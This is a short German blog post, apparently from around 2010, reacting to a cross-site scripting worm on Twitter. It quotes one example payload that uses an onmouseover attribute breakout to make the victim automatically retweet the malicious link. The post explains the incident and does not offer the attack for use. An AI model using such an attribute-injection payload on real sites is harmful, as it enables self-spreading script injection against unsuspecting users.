Ich traue mich schon gar nicht mehr Twitter zu öffnen.
Ein Skriptkiddie hat mal wieder eine Sicherheitslücke in Twitter gefunden, über die man JavaScript-Code ausführen kann, gar nicht mal blöd, anfangs mit MouseOver, jetzt anscheinend bei onLoad, natürlich wird es dann auch sofort retweeted, das es in der Timeline der Follower auftaucht. Sehr effizient von der Verbreitung.
Zum Glück beschränkt es sich auf CSS-Manipulationen – einen Screenshot erspare ich euch mal!
Hier mal ein Beispiel-Code (es gibt ja mittlerweile genug Derivate):
http://t.co/@”onmouseover=”document.getElementById(‘status’).value=’RT <http://t.co/@%22onmouseover=%22document.getElementById(> Twitrotor’;$(‘.status-update-form’).submit();”class=”modal-overlay”/